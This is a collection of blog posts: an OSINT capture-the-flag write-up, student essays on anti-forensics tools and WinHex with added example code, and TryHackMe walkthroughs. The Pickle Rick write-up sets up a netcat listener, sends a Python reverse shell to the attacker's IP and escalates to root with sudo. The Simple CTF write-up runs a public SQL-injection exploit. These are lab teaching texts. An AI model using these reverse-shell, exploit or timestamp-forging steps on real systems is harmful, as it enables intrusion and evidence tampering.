The first result is this twitter account.

twitter home

The first question asks what the user's avatar is, putting in cat is the correct answer.

What city is this person in?

The twitter account has two posts, one of which says:
From my house I can get free wifi ;D Bssid: B4:5D:50:AA:86:41 - Go nuts!

BSSID stands for Basic Service Set Identifier. It identifies one access point in a wireless network (WLAN) together with its associated clients, and in practice it is the MAC address of the access point's radio.

This can be used to find the location of the WLAN. A website called wigle.net "consolidates location and information of wireless networks world-wide to a central database."

wigle

We can put the BSSID in wigle and find a location in London.

Whats the SSID of the WAP he connected to?

By creating an account, we can search up the BSSID and find the SSID of the WAP. We see the result shown is UnileverWiFi

wapSSID

What is his personal email address?

So, we basically got all we could out of the BSSID, lets look for another method of finding this person's email address.

Our best tool is actually Google. We still have the username, owoodflint. A simple Google search for it also turns up a GitHub profile, which has his email.

github

What site did you find his email address on?

We found it on github! See the previous question above.

Where has he gone on holiday?

There isn't much else on his github, we may return there later, but for now lets examine what other accounts we can find using google.

OH! We see a wordpress blog.

wordpress

It says they are in New York right now, but we know that they live in London. So this must be where they are on vacation.

What is this persons password?

This was a tough one, admittedly. I kept google dorking this dude's name in different ways, and was having trouble finding anything useful. (BTW I will give a big google dork hint to help you get less garbage in your google searches during a CTF at the end of this page)

Anyway, I looked back at the original google search of owoodflint and found something that stuck out to me. Take a look and see if you can spot it too.

googlesearch

Did you see it? Look at the description of the first result. What is that word, "pennYDr0pper"? I don't remember seeing anything that ludicrous on the page! Let's take a closer look at the blog.

blog

Its not on the page, that we can see. But the word came right after the word "photos!" in the google search result description.

Lets try highlighting all the text with ctrl + A

highlighted text

There it is! It looks to be the same format as our text input should be on the TryHackMe page, and it works as our password.

Also, for you dorks out there inspecting the source, you can find it there too.

source


And thats all! But wait...

If you looked closely at my search before, you may have seen it look a little weird:

search

This is an example of what's called a Google dork. Google dorking, or Google hacking, is a technique for finding open-source intelligence on Google by modifying the search to be more or less restrictive.

For example, in the picture I put -tryhackme. This is because a lot of the search results I would get when searching the phrase oliver woodflint or owoodflint would bring up writeups for the TryHackMe challenge that I was in the middle of doing. This is annoying to sift through, and can waste time figuring out what result is a writeup and what result is legitimate.

So, when you put a - sign directly in front of a phrase in a google search, it tells google to hide any results with that phrase. So my -tryhackme took all the results that had the word tryhackme in it and threw them in the trash. You can also put stuff like -osint, -OhSINT (the name of the challenge), -writeup in the google search to really get rid of all the writeups and keep it only to the content that the CTF author intended to show up (plus maybe one or two legitimate people or businesses named Oliver Woodflint)

Have fun, and good luck on your OSINT adventures!

🙂

Anti-Forensics: 3 tools

This essay was originally written 03 Oct 2021 for Professor Leinecker's Digital Forensics I course.


  1. xxUSBSentinel  (https://github.com/thereisnotime/xxUSBSentinel)

You can download the executable for this tool from GitHub. Its goal is to "make recovering your encryption drive keys almost impossible." I had trouble understanding this tool at first, so I did more research. When a computer is shut down, there is a chance that a key storage utility will lose the encryption key for an encrypted drive, requiring the user to enter it again [1]. Knowing this, the tool's purpose is a quick key-loss implementation. You launch the program, plug in and unplug your USB stick, and the next time you insert the USB stick you can arm the device to listen for the disconnect message, after which it will shut down your computer.

Let’s say you have an encrypted USB stick on your computer. You want the key for this drive to be forgotten should investigators look at your computer. This utility makes it so that when the user pulls their USB stick from the computer, the encryption key is forgotten and must be entered again upon the next use of the drive. An investigator can get around this via social engineering, by accessing the computer while the USB stick is still inserted.

  2. Metadata-Remover  (https://github.com/Anish-M-code/Metadata-Remover)

This tool is simple - it removes identifiable metadata from images and videos. The use of this tool is to protect your anonymity when posting media. This is a CLI tool written in C and Python3. To use it you can just download the latest release, install to a directory, and run the exe. This launches a command line. Drag your image to the “images” folder in the tool directory, then you put the name of the image. This scrubs it.

The importance of this tool is to protect your anonymity. People can use image and video metadata to identify your location and other personally identifiable information. A forensic investigator can thwart these efforts by gaining access to the original file. The unfortunate part with this method, is that it is supposed to be used when uploading files online, so an investigator would need access to the host machine and there may be a copy of the original. 
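As an added example (not part of the OhSINT writeup, of ExifTool, or of Metadata-Remover), here is what ExifTool read from the OhSINT image and what a metadata scrubber removes, done by hand on the PNG chunk structure. A PNG is an 8-byte signature followed by length/type/data/CRC chunks; textual metadata such as Copyright lives in tEXt (and zTXt/iTXt) chunks, which are ancillary and can be dropped without touching the pixels. A minimal 1x1 PNG with a planted Copyright chunk is constructed inline; the Copyright value is the one from the room, and nothing else about the real file is assumed.

```python
"""Read and strip PNG textual metadata by walking the chunk structure.
Added example; not code from the original pages or from the tools they mention."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunks that carry metadata rather than image data. tIME and eXIf are
# included because a scrubber should drop them too.
METADATA_CHUNKS = {b"tEXt", b"zTXt", b"iTXt", b"tIME", b"eXIf"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk, verifying CRCs, stopping at IEND."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, data
        pos += 12 + length
        if ctype == b"IEND":
            break


def read_text_metadata(png: bytes) -> dict:
    """Keyword -> value for tEXt (Latin-1), zTXt (zlib) and iTXt (UTF-8) chunks."""
    meta = {}
    for ctype, data in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, val = data.partition(b"\x00")
            meta[key.decode("latin-1")] = val.decode("latin-1")
        elif ctype == b"zTXt":
            key, _, rest = data.partition(b"\x00")        # rest = method byte + zlib data
            meta[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"iTXt":
            key, _, rest = data.partition(b"\x00")
            compressed = rest[0]                           # compression flag
            rest = rest[2:]                                # skip flag and method
            _, _, rest = rest.partition(b"\x00")           # language tag
            _, _, text = rest.partition(b"\x00")           # translated keyword
            meta[key.decode("latin-1")] = (zlib.decompress(text) if compressed else text).decode("utf-8")
    return meta


def strip_metadata(png: bytes) -> bytes:
    """Rebuild the file without any metadata chunk; pixels and dimensions are untouched."""
    out = bytearray(PNG_SIG)
    for ctype, data in iter_chunks(png):
        if ctype not in METADATA_CHUNKS:
            out += _chunk(ctype, data)
    return bytes(out)


def build_sample_png() -> bytes:
    """Constructed 1x1 greyscale PNG carrying a Copyright tEXt chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, greyscale, no interlace
    scanline = b"\x00\x80"                               # filter byte 0 + one mid-grey pixel
    return (PNG_SIG
            + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", b"Copyright\x00OWoodflint")
            + _chunk(b"IDAT", zlib.compress(scanline))
            + _chunk(b"IEND", b""))


if __name__ == "__main__":
    original = build_sample_png()
    print("metadata found:", read_text_metadata(original))
    clean = strip_metadata(original)
    print("after scrubbing:", read_text_metadata(clean), "chunks:",
          [c.decode() for c, _ in iter_chunks(clean)])
```

Two practical notes follow from the code. Scrubbing is a rewrite, not an in-place edit, so the original file (with its metadata) usually still exists somewhere, which is the investigator's angle mentioned above. And the scrubber only removes what it knows about: a keyword hidden in an unknown ancillary chunk, or in the pixel data itself, survives it, which is where steganography proper, rather than metadata, begins.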

  3. ForensicsF***er (https://github.com/NoahGWood/FileChanger)

This tool modifies timestamps after a pre-determined length of time passes. A user runs the program and it modifies the file times on an ext4 file system (Linux only). It also has a self-destruct mode that deletes the Python script after use. It is more a proof of concept than a usable tool (Linux only, pre-determined files), but the idea could be built into a more user-friendly tool.

The real-world use of this tool is to remove data integrity. If you have evidence, and all the timestamps are from a date after the investigation started, this could ruin the integrity of the investigation (at least from an outside perspective) and force evidence to be thrown out. A forensic investigator could prevent this by removing the program before it goes off, or by imaging the file system multiple times and only working on those that have not been modified by the program. 
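As an added example (not part of the original essay or of the tool it describes), here is the timestamp trick such a tool relies on, beside the check an examiner runs against it. On Linux a user can set a file's atime and mtime to anything with utime(2), but ctime (the inode change time) is always set by the kernel to "now" and cannot be set from user space. A forged mtime that lies in the future, or later than ctime, is therefore self-incriminating; a forged mtime in the past is not caught by these checks, and the demo shows that too. A temporary directory is created for the sample file.

```python
"""Timestamp forgery from user space, and the stat()-level checks that catch part of it.
Added example; not code from the original essay or from FileChanger."""
import os
import tempfile
import time


def forge_mtime(path: str, new_mtime: float) -> None:
    """What an anti-forensics tool can do: rewrite atime and mtime with utime(2).
    ctime is not an argument; the kernel stamps it with the current time."""
    os.utime(path, (new_mtime, new_mtime))


def timestamp_anomalies(path: str, investigation_start: float, now: float = None) -> dict:
    """Checks on one file's stat() results. Each flag is True when suspicious."""
    st = os.stat(path)
    now = time.time() if now is None else now
    return {
        "mtime": st.st_mtime,
        "ctime": st.st_ctime,
        # a modification time the kernel could not have produced
        "mtime_in_future": st.st_mtime > now + 60,
        # on an untouched file mtime is never newer than ctime (1 s slack for coarse clocks)
        "mtime_after_ctime": st.st_mtime > st.st_ctime + 1,
        # the essay's scenario: the file claims to have changed after the case was opened
        "mtime_after_investigation_start": st.st_mtime > investigation_start,
    }


def demo() -> dict:
    """Create a sample file, then forward-date and back-date it, reporting what each check sees."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "evidence.txt")
        with open(path, "w") as f:
            f.write("constructed sample file\n")
        created = time.time()
        case_opened = created + 3600            # pretend the case opened an hour after this write
        results["untouched"] = timestamp_anomalies(path, case_opened)
        forge_mtime(path, created + 365 * 86400)   # a year in the future
        results["forward_dated"] = timestamp_anomalies(path, case_opened)
        forge_mtime(path, created - 400 * 86400)   # long before the case
        results["back_dated"] = timestamp_anomalies(path, case_opened)
    return results


if __name__ == "__main__":
    for label, report in demo().items():
        flags = [k for k, v in report.items() if v is True]
        print(f"{label:14} flags: {flags or 'none'}")
```

The back-dated case passing clean is the important caveat: stat() alone cannot prove a past mtime is false. For that an examiner goes to sources the forger did not control, such as the file's birth time (statx on ext4, exposed by `stat` on recent coreutils), the file system journal, or on NTFS the $FILE_NAME timestamps in the $MFT record, and compares them with the claimed mtime.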


Sources:

[1] Afonin, O. (2021, September 23). Forensic implications of sleep, hybrid sleep, hibernation, and fast startup in Windows 10. ElcomSoft blog. Retrieved October 3, 2021, from https://blog.elcomsoft.com/2021/09/forensic-implications-of-sleep-hybrid-sleep-hibernation-and-fast-startup-in-windows-10/. 

Getting Started with WinHex

This post was originally written 27 August 2021 for Professor Leinecker's Digital Forensics I course.


This paper will discuss my experience with WinHex. I do not own the product yet, however I have read up on the software and watched videos of it in action. To begin, it seems when you open a file or examine a drive, you can view the raw hex of it. I am not too sure when this would come in handy, but my guess would be in defeating steganography efforts. What seems really cool however, is the ability to edit the hex values. This would allow you to change the contents of a file at such a low level, that you may be able to obfuscate the original data or alter it in a non-human-readable way, however this is just speculation.

I am curious about how the software is able to recover deleted data. I do not know enough yet to make much more than an educated guess on how the process works, but I would imagine it may look at recently modified sections of memory and somehow reverse engineer what the memory was in its original state (maybe factoring in the time since modification, or performing an inverse function of some sort, i.e. if deleting data puts the bits through a deletion algorithm, put them through the inverse of said algorithm).

I would like to see if the software can be used in Capture The Flag challenges. This is a hobby of mine, and if WinHex could assist in file-recovery-focused or steganography-focused CTF challenges, then it would give me a leg up on the competition. Again, not knowing much about the software makes it difficult to speculate, but I would imagine that WinHex will eventually either be put in a suite of tools that all come pre-baked into a digital forensics suite, or be replaced by a free, open-source version.

WinHex – Feature Overview

This paper was originally written 10 Sept 2021, for Professor Leinecker's Digital Forensics I class.


This paper will provide a rough overview of several features that WinHex, a digital forensics tool, offers. To begin, WinHex can be used to view the hex and ASCII contents of a file or file system, recover a file, look at recently deleted files on a file system, alter a file at the hex or ASCII level, and much more. It contains a plethora of tools, all designed for use in digital forensics investigations.

One such tool is the Compute Hash tool, accessed through the Tools menu. It takes a file and computes a hash of its contents. The most commonly used hashes are MD5 and SHA-1; however, there are many others, such as SHA-256 and RIPEMD-128. In a digital forensics investigation, and elsewhere, hashes are used as a form of integrity check. A hash value is, in theory, a value unique to a file, derived from its contents. The data in a file is put through an algorithm such as those listed earlier, and the value that comes out will change if any of the data in the file is modified. This allows a reader to be confident that the data in a file has not been altered so long as the hash value is the same as it was earlier.

Another tool in WinHex is the HexConverter, also accessed through the Tools menu. It takes either a hexadecimal or a decimal number and converts it to the other base. For example, if one puts A203 in the hexadecimal field, 41475 is given back, which is the decimal equivalent. This is very useful for making measurements more understandable. If you were to present hexadecimal values to a jury, they may become confused or frustrated, as very few lay people understand hex well enough to relate it to their own experience. Using this tool to convert hex to decimal will allow juries to better understand the evidence being shown, and come to a more rational and well-thought-out conclusion, without changing the underlying truth behind the evidence or data.

One last tool to discuss is the Clone Disk tool, accessed through Tools -> Disk Tools -> Clone Disk. It allows you to make an exact copy of a disk to another device. This is very useful to investigators, as you never want to do analysis on an original piece of evidence, or else you risk accidentally or intentionally modifying that evidence. Misuse of original evidence could mean the evidence being thrown out, or the entire case being declared a mistrial.

This tool has several options you can adjust. You can choose to copy the entire medium, meaning the whole disk is copied over, or you can copy specific sectors of the source. You can label any sector that can't be read, which makes identifying damaged or corrupted sectors a lot easier. You can also skip damaged areas altogether, the benefit being that the copy takes up less space.

One option is to copy sectors in reverse order. I did some digging and can’t seem to find out why this would be done, and I suspect it may change the hash value from the original, but I haven’t tested it. My one hypothesis is that copying the sectors backwards might reveal some sort of steganography technique. When selecting the option, it gives you a prompt asking if you are confident you want to copy backwards, which tells me that it probably isn’t used very often unless under specific circumstances. 
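Here is an added example (my code, not WinHex's) that models the features just described on a constructed eight-sector disk: a hash computed over the whole image for integrity, a sector-range clone that stamps a label into any sector that fails to read (or leaves it zeroed to "skip damaged areas"), and the reverse-order option. I assume the reverse option only changes the order in which sectors are read while each sector still lands at its own offset; that is my assumption, not something the page confirms about WinHex. Under it, a reverse clone of a healthy disk hashes identically to a forward one, and only an unreadable sector changes the hash. SHA-256 is the default here because MD5 and SHA-1 collisions are known, even though both remain common for matching against existing hash sets.

```python
import hashlib
from typing import List, Optional, Tuple

SECTOR_SIZE = 512

# Constructed marker written in place of a sector that could not be read, so damaged areas
# stand out when the image is viewed as hex. (A label of my choosing, not WinHex's.)
BAD_SECTOR_LABEL = (b"<UNREADABLE SECTOR>" * 40)[:SECTOR_SIZE]


class ToyDisk:
    """A constructed stand-in for a physical medium: a byte buffer plus the sector indices
    that fail when read, which is how a damaged drive presents itself to an imager."""

    def __init__(self, data: bytes, unreadable=()):
        if len(data) % SECTOR_SIZE:
            raise ValueError("disk size must be a whole number of sectors")
        self.data = data
        self.unreadable = set(unreadable)

    @property
    def sector_count(self) -> int:
        return len(self.data) // SECTOR_SIZE

    def read_sector(self, index: int) -> bytes:
        if index in self.unreadable:
            raise IOError(f"sector {index} unreadable")
        start = index * SECTOR_SIZE
        return self.data[start:start + SECTOR_SIZE]


def digest(data: bytes, algorithm: str = "sha256") -> str:
    """Compute Hash: the fingerprint kept with an image to prove it has not changed."""
    return hashlib.new(algorithm, data).hexdigest()


def clone(disk: ToyDisk, first: int = 0, last: Optional[int] = None, *,
          reverse: bool = False, label_unreadable: bool = True) -> Tuple[bytes, List[int]]:
    """Sector-by-sector copy of disk[first..last] into a fresh buffer.

    reverse=True changes only the order in which sectors are *read*; every sector is still
    written at its own offset (my assumption about the WinHex option, stated in the text).
    label_unreadable=True stamps BAD_SECTOR_LABEL into sectors that fail to read; False
    leaves them zero-filled. Returns (image_bytes, sorted list of bad sector indices).
    """
    if last is None:
        last = disk.sector_count - 1
    image = bytearray((last - first + 1) * SECTOR_SIZE)
    bad: List[int] = []
    order = range(last, first - 1, -1) if reverse else range(first, last + 1)
    for index in order:
        offset = (index - first) * SECTOR_SIZE
        try:
            image[offset:offset + SECTOR_SIZE] = disk.read_sector(index)
        except IOError:
            bad.append(index)
            if label_unreadable:
                image[offset:offset + SECTOR_SIZE] = BAD_SECTOR_LABEL
    return bytes(image), sorted(bad)


def sample_disk(unreadable=()) -> ToyDisk:
    """Eight sectors of deterministic constructed content: sector i is filled with byte i."""
    data = b"".join(bytes([i]) * SECTOR_SIZE for i in range(8))
    return ToyDisk(data, unreadable)


if __name__ == "__main__":
    healthy = sample_disk()
    forward, _ = clone(healthy)
    backward, _ = clone(healthy, reverse=True)
    print("forward == reverse:", digest(forward) == digest(backward))
    damaged_image, bad = clone(sample_disk(unreadable={3}))
    print("bad sectors:", bad, "hash still matches source:",
          digest(damaged_image) == digest(healthy.data))
```

The point for an investigator is the last line: a clone with even one labelled or skipped sector will never hash-match the original, so the bad-sector list has to be recorded alongside the hash for the image to be explainable later.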

Pickle Rick


TO VIEW THIS WRITE-UP WITH ALL IMAGES INCLUDED, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 31 July 2021

Room Link

Github Link


Task 1: Pickle Rick

With this box, we are given nothing but an IP address and 3 questions, each asking the name of 1 ingredient that Rick needs. So let's begin.

The First Ingredient

Let's start poking at this IP address we have and see what comes up.

Running the nmap command nmap -sC -sV -O -oN nmap.txt <IP> gives us the following:

nmap

Let's break this nmap command down:

  • nmap - Tells Linux to run an nmap scan
  • -sC - Runs default scripts
  • -sV - Probes open ports to determine service/version info
  • -O - Enables OS detection
  • -oN nmap.txt - Outputs the scan in the normal format to the file nmap.txt
  • 10.10.55.186 - The IP address of our box

The output tells us that there are two services running: SSH and HTTP.

Since we know there is a web service, I will start up gobuster, a tool for enumerating the directories of a website. I will go over the details later, but while that is running in the background, let's take a look at the website.


website home

There isn't much to it. A picture and some unassuming text. Taking a look at the page source (in Firefox, right-click, then select View Page Source) we can find a username: R1ckRul3s.

website home viewing source

Nice! That is the first half of a set of credentials (we still need the password). Make sure you write this down for later.

Let's see if there is a robots.txt page. Oh, I should probably explain what that is. Google's developer documentation says that a robots.txt file "tells search engine crawlers which URLs the crawler can access on your site. It is used mainly to avoid overloading your site with requests." Cool! So basically, instead of a robot on the internet having to check every single page your website has to see if it can access it, it can look at the robots.txt file to see where it is allowed to go, saving your website the overhead.

If we navigate to /robots.txt in our web browser, all we get is the text: Wubbalubbadubdub

Not too interesting, but, like any text that stands out, you should write it down and see if it does anything interesting later.


Let's go back to our gobuster results.

gobuster

Two results, /assets and /server-status, neither of which is very interesting. I will let you explore them as you wish.

For now, I will explain what gobuster is, its input, and how to interpret its output. Gobuster is a tool that enumerates directories on a web server. Basically, when you are given an IP address and type it into the address bar at the top of a web browser, it takes you to that website's home page. There are often other pages within that web server's address that can be found by putting a / character after the IP address (1.2.3.4/robots.txt or 14.32.122.34/assets).

gobuster dir -u http://10.10.74.255 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

Let's break down this command:

  • gobuster - the command to run the gobuster program
  • dir - Run in directory mode, because we are enumerating web server directories
  • -u http://10.10.74.255 - Gives the url to gobuster
  • -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt - Gives the wordlist to run against the URL. If you have Kali Linux, the /usr/share/wordlists directory is an amazing directory that contains a whole bunch of wordlists to use for many different things. The dirbuster/directory-list-2.3-medium.txt list is a good one to use for gobuster directory enumeration.
  • | - Pipes the output into the following command
  • tee - This command takes the output and both shows it on the terminal screen (which is called standard output) and saves the output to a file of your choice
  • gobuster.txt - The name of the file to save the gobuster results to

On the bottom of the gobuster output, you see /assets and /server-status which are the directories the program found.


I also ran nikto on the IP address to look for any known vulnerabilities. The output revealed something interesting...

nikto

An admin login page called /login.php. Let's explore this.


login

Nice!! A login page. We know from earlier that a valid username should be R1ckRul3s. The only other information we have gathered so far is that random Wubbalubbadubdub from the robots.txt page. Let's try that out.


command panel

Awesome, it brought us to a new page, Command Panel. Given that this is a command panel, if we try the command ls, it outputs a list of files.

trying ls command in command panel

Here, we see one file in particular, Sup3rS3cretPickl3Ingred.txt. Trying the cat command to read it doesn't work; the command has been disabled. Trying head also doesn't work, but less works!

less ingredientfile command panel

Our first ingredient is mr. meeseek hair
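The cat/head/less behaviour above is what a blocklist of program names looks like from the outside. As an added example (my code, not the panel from the room), here is that blocklist next to the form a defender should use instead: an allowlist of programs, capped argument counts, path arguments confined to the panel's directory (/var/www/html, where pwd puts us later in this write-up), and no shell between the web request and the process. The program lists here are constructed; the room's actual filter is not shown on the page.

```python
import shlex
import subprocess
from pathlib import Path
from typing import List, Optional

# Constructed blocklist reproducing what the panel appears to do: refuse a few readers by name.
BLOCKED_PROGRAMS = {"cat", "head", "more", "tac"}

# Hardened variant: programs that may run, each with the maximum number of arguments allowed.
# Anything not listed is refused, so a new reader or pager gains nothing.
ALLOWED_PROGRAMS = {"ls": 1, "wc": 1}

# The panel's working directory on the box; every path argument must resolve inside it.
BASE_DIR = Path("/var/www/html")


def blocklist_allows(cmdline: str) -> bool:
    """The weak check: only the first word is compared against the blocklist, so any program
    not on the list (less, for example) goes straight through."""
    argv = shlex.split(cmdline)
    return bool(argv) and argv[0] not in BLOCKED_PROGRAMS


def allowlist_argv(cmdline: str, base: Path = BASE_DIR) -> Optional[List[str]]:
    """The hardened check. Returns an argv list safe to hand to subprocess without a shell, or
    None if anything about the request is not explicitly permitted:
      * the program must be in ALLOWED_PROGRAMS;
      * argument count is capped and option-style arguments ("-...") are refused;
      * path arguments must resolve to somewhere under base (no "..", no absolute paths);
      * shell metacharacters are harmless because no shell ever sees the string.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    args = argv[1:]
    if len(args) > ALLOWED_PROGRAMS[argv[0]]:
        return None
    base = base.resolve()
    for arg in args:
        if arg.startswith("-"):
            return None
        target = (base / arg).resolve()
        if target != base and base not in target.parents:
            return None
    return [argv[0], *args]


def run_allowlisted(cmdline: str, base: Path = BASE_DIR) -> str:
    """Execute only what allowlist_argv approved, with shell=False and cwd pinned to base."""
    argv = allowlist_argv(cmdline, base)
    if argv is None:
        raise PermissionError(f"refused: {cmdline!r}")
    done = subprocess.run(argv, cwd=base, capture_output=True, text=True, timeout=5)
    return done.stdout


if __name__ == "__main__":
    for request in ("cat Sup3rS3cretPickl3Ingred.txt", "less Sup3rS3cretPickl3Ingred.txt",
                    "ls", "ls ../../etc", "ls; id"):
        print(f"{request!r:40} blocklist={blocklist_allows(request)!s:5} "
              f"allowlist={allowlist_argv(request)}")
```

The blocklist passes the less request, which is exactly the gap walked through above; the allowlist refuses it, along with the traversal and the chained command, without needing to know what less does.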


The Second Ingredient

Since this is a command panel, and it clearly runs Linux commands, let's see if we can run a reverse shell script on it.

First, open a new tab on your terminal and run the command:

nc -lvnp 1234

This tells netcat to:

  • -l - listen for inbound connections
  • -v - be verbose
  • -n - use numeric-only IP addresses, no DNS
  • -p - specify the port to listen on

So now netcat is listening on port 1234 for incoming connections. The connection would have to come in on our OpenVPN IP address.

nc listening

We can find our OpenVPN IP address with the command: ip a s

ip

The IP address we want to use for our reverse shell is the one on tun0 (in my case, 10.6.77.21).

Going back to the command panel, let's see if we have access to python3. Typing python3 --version gives us a response with the version number, so we know we can use python3. Head over to the pentest monkey cheat sheet to grab the Python reverse shell. (By the way, pentest monkey is an amazing resource for spawning a reverse shell when you have a command execution vulnerability, which is what the command panel we have been using is.)

Throw this line of code into Sublime or Vim to edit it; we need to change the version of Python we are using and the IP address:

  • Change [python] -> [python3] - this is because we don't know if we have python, but we know we have python3.
  • Change [10.0.0.1] -> [the tun0 IP address we found earlier] - This sends the connection to that IP address, which netcat is listening on. The port number (1234) can stay the same because netcat is listening on that port, but if you chose a different one during the netcat setup, make sure you change the port in the reverse shell code to the one you picked.

Throw that new line of code into the command execution panel and run it. Going back to our netcat, we see that we are in!

netcat connected to reverse shell


Let's explore this shell a little bit.

Running whoami tells us we are www-data. pwd tells us we are in /var/www/html. We can read the clue.txt file and we get back "Look around the file system for the other ingredients", so let's go do that.

Heading into the /home directory we see two users: rick and ubuntu.
The rick directory has just one file: second ingredient. Reading it gives us 1 jerry tear!!!! That is our second ingredient 🙂


The Third Ingredient

So, we got basically all we need from the rick directory; what about checking out that /root directory? If you try, you can see that you aren't allowed in. This is because we don't have root privileges to get into that directory. Let's try to change that.

Typing sudo -l will tell us what commands the current user (www-data) is allowed (and forbidden) to run.

sudo l

The bottom shows that www-data may run (ALL) NOPASSWD: ALL, meaning that we can run nearly any command via sudo without a password. Knowing this, typing sudo -i will start a new shell as root, giving us the root access we needed before.

sudo i

From here, we can find the flag in the /root directory and read it for the last ingredient: fleeb juice

flag


And that is really all there is! As you can see, sometimes sudo -l can reveal that you can run virtually any command via sudo, which is a horrible mistake on the part of whoever administers the box, but great for you. Happy hacking!

🙂

Simple CTF


TO SEE THIS WRITE-UP WITH ALL IMAGES, PLEASE VISIT THE GITHUB LINK BELOW. Thank you.

Armand Alvarez | 11 August 2021

github.com/Armand-Alvarez

Room link on TryHackMe


Since this is a simple room, we will go through the questions and I will show my thought process and work to solve each question.

How many services are running under port 1000?

To figure this out, we need to run a specific nmap command:

nmap

Let's go over this command:

sudo nmap 10.10.127.163 -p1-1000 -T5 -oN nmap.txt

  • sudo nmap 10.10.127.163 - Runs nmap as a superuser on IP 10.10.127.163 (this was the IP of the box I needed to get into)

  • -p1-1000 - Scan ports 1-1000 (the first 1000 ports)

  • -T5 - Run the fastest scan you can (1 is slowest, 5 is fastest)

  • -oN nmap.txt - Put normal-output in the file nmap.txt

We see that there are 2 ports open in the first 1000: port 21 and port 80!


What is running on the higher port?

We only see 2 ports with our small 1-1000 scan, but if we run a larger scan we may see more information.

big nmap

Running our scan with -sC and -sV, we see the addition of port 2222 running SSH.
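Both nmap questions in this room, and the scan breakdown in the Pickle Rick write-up above, come down to reading the PORT/STATE/SERVICE table, so here is an added example (my code, not from the room or from nmap) that parses nmap's normal (-oN) output and answers the two questions. The report text is constructed: ports 21, 80 and 2222/ssh match what the scans showed, the VERSION strings are placeholders rather than what the box actually ran, and the remaining lines are there to show that header, script (|) and footer lines are skipped.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in nmap's normal (-oN) format. Open ports match the Simple CTF scans;
# version strings are placeholders.
SAMPLE_NMAP = """\
# Nmap 7.91 scan initiated Wed Aug 11 10:00:00 2021 as: nmap -sC -sV -p- -oN nmap.txt 10.10.127.163
Nmap scan report for 10.10.127.163
Host is up (0.10s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     sample-ftpd (constructed placeholder)
22/tcp   closed ssh
80/tcp   open   http    sample-httpd (constructed placeholder)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open   ssh     sample-sshd (constructed placeholder)
|_ssh-hostkey: placeholder
Service Info: OS: Linux

# Nmap done at Wed Aug 11 10:01:00 2021 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# One row of the port table: "<port>/<proto>  <state>  <service>  [<version...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_ports(text: str) -> List[Dict]:
    """Turn the PORT/STATE/SERVICE table of an -oN report into dicts. Header, script ("|")
    and footer lines do not match the row pattern and are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["port"] = int(row["port"])
            row["version"] = row["version"].strip()
            ports.append(row)
    return ports


def open_ports(ports: List[Dict]) -> List[Dict]:
    """Only rows nmap reported as open; closed and filtered rows are not running services."""
    return [p for p in ports if p["state"] == "open"]


def count_open_below(ports: List[Dict], limit: int) -> int:
    """Answers 'how many services are running under port <limit>'."""
    return sum(1 for p in open_ports(ports) if p["port"] < limit)


def highest_open(ports: List[Dict]) -> Optional[Dict]:
    """Answers 'what is running on the higher port'."""
    return max(open_ports(ports), key=lambda p: p["port"], default=None)


if __name__ == "__main__":
    rows = parse_ports(SAMPLE_NMAP)
    print("open under 1000:", count_open_below(rows, 1000))
    top = highest_open(rows)
    print("highest open port:", top["port"], top["service"])
```

The state filter matters: a -p1-1000 scan of a box with a closed port 22 still prints a 22/tcp row, and counting rows instead of open rows would give the wrong answer to the first question.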

What's the CVE you're using against the application?

If we go to the IP address in a web browser, we are just greeted with the default Apache2 page.

home

Running gobuster reveals /simple. Let's check it out.

simple

This is more interesting! Exploring the page also reveals the version of the CMS:

simple version

Let's search this version on ExploitDB to see if it reveals anything.

Searchsploit is a Kali command that searches a local copy of Exploit-DB. We searched for the keywords cms, 2.2.8, made, and simple. It revealed an SQLi:

searchsploit

Running the same command with the -w option will also show the exploit-db URL, which reveals the CVE number:

cve

Looks like we are using CVE-2019-9053.


To what kind of vulnerability is the application vulnerable?

We know this is an SQLi, or SQL injection.


What's the password?

To use the exploit, let's copy it into the current working directory. (I recommend making a separate directory for each TryHackMe room you do.)

Our original searchsploit result gave part of the path: php/webapps/46635.py.

We can run the following command to copy it to the current working directory:

sudo cp /usr/share/exploitdb/exploits/php/webapps/46635.py exploit.py

The exploit database is kept under /usr/share on Kali Linux; we know it is an exploit from our searchsploit results, and the rest of the path was given to us. I saved it as exploit.py in my directory.

Now let's try running the exploit:

exploit

If you type python2 ./exploit.py, it will give you example usage of the exploit, which is how I knew what command to run.

We see that the password is secret


Where can you login with the details obtained?

We can log into the FTP server as anonymous and download the only file in it. It contains nothing important, so we don't need the login details there.

